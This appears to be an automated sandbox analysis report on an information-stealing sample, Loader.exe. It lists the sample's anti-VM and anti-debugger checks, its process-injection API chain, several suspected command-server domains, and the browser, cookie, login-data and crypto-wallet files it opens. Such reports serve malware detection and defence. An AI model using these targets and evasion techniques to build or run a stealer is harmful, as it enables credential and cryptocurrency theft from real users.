                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: Loader.exeStatic PE information: real checksum: 0x97a45 should be: 0x91f35
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A9D0B9 push ecx; retf 0_2_00A9D0D2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A9D0D3 push ecx; retf 0_2_00A9D0DE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A6FB83 push ecx; ret 0_2_00A6FB96
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004488E1 push edi; ret 3_2_004488E3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F2F0 push eax; mov dword ptr [esp], F5F4FB8Ah3_2_0043F2F2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A6FB83 push ecx; ret 3_2_00A6FB96
                Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Loader.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21193
                Source: C:\Users\user\Desktop\Loader.exeAPI coverage: 9.1 %
                Source: C:\Users\user\Desktop\Loader.exe TID: 5592Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 5728Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A81FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00A81FE9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A81F38 FindFirstFileExW,0_2_00A81F38
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A81FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00A81FE9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A81F38 FindFirstFileExW,3_2_00A81F38
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2234989193.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2098036172.0000000005374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2234989193.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2234878448.0000000002BDC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2233872886.0000000002BDC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2098036172.0000000005374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Loader.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043DA10 LdrInitializeThunk,3_2_0043DA10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A6F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A6F8E9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A9A19E mov edi, dword ptr fs:[00000030h]0_2_00A9A19E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A61FB0 mov edi, dword ptr fs:[00000030h]0_2_00A61FB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A61FB0 mov edi, dword ptr fs:[00000030h]3_2_00A61FB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A7D8E0 GetProcessHeap,0_2_00A7D8E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A6F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A6F52D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A6F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A6F8E9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A6F8DD SetUnhandledExceptionFilter,0_2_00A6F8DD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A77E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A77E30
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A6F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00A6F52D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A6F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00A6F8E9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A6F8DD SetUnhandledExceptionFilter,3_2_00A6F8DD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A77E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00A77E30

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A9A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00A9A19E
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cureprouderio.click
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00A7D1BD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00A81287
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00A814D8
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00A81580
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00A817D3
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00A81840
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00A81915
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00A81960
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00A81A07
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00A81B0D
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00A7CC15
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00A7D1BD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00A81287
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00A814D8
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00A81580
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00A817D3
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00A81840
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00A81915
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00A81960
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00A81A07
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00A81B0D
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00A7CC15
                Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A700B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_00A700B4
                Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Loader.exe, 00000003.00000003.2176731484.0000000005353000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 5396, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Loader.exe, 00000003.00000003.2149819598.0000000002BF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: Loader.exe, 00000003.00000003.2149819598.0000000002BF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Loader.exe, 00000003.00000003.2150289757.0000000002BED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: Loader.exe, 00000003.00000003.2149819598.0000000002BF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Loader.exe, 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Loader.exe, 00000003.00000003.2149450871.0000000002C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: Loader.exe, 00000003.00000003.2149819598.0000000002BF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: Loader.exe, 00000003.00000003.2150289757.0000000002BED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Loader.exe, 00000003.00000003.2149450871.0000000002C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
